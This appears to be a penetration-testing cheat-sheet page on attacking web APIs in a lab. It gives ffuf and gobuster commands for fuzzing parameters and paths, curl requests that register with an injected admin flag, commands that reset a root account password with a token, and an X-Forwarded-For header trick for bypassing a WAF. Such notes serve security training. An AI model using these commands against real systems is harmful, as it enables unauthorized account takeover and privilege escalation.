search

APIs

hashtag
Fuzzing APIs

/usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/login/v1?FUZZ=1 
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.205.249:33414/?FUZZ=1
circle-info

Burp could also be used with Intruder + Sniper

hashtag
Rest APIs

APIs usually follow the format of /api_name/v1 , we can enumerate using a gobuster pattern 

gobuster dir -w directories.txt -p apis_patt.txt -u http://192.168.205.249:33414/ -t100

hashtag
Inspecting the API

curl -i http://192.168.205.249:33414/help 
curl http://192.168.205.249:33414/help | python -m json.tool
circle-info

You should dir bust all api paths you find

hashtag
Posting to an API

curl -d '{"user":"admin", "password":"test"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/login/v1

curl -d '{"user":"admin", "password":"test", "admin":"True"}' -H 'Content-Type:application/json' http://192.168.205.249:33414/register/v1

hashtag
Example: Changing root account password

curl 'http://192.168.50.16:33414/user/v1/root/password' -H 'Content-Type: application/json' -H 'Authorization: OAuth eyJ0eXAiOiJKV1Q -d '{"password": "adot8"}'

curl -X 'PUT' 'http://192.168.50.16:33414/users/v1/root/password' -H 'Content-Type: application/json' -H 'Authorization: OAuth eyJ0eXAiOiJKV1Q' -d '{"password": "adot8"}'

hashtag
Uploading Files

hashtag
WAF Bypass

Add the X-Forwarded-For: 127.0.0.1 header to the request.

PreviousXXSNextPHP Applications

Last updated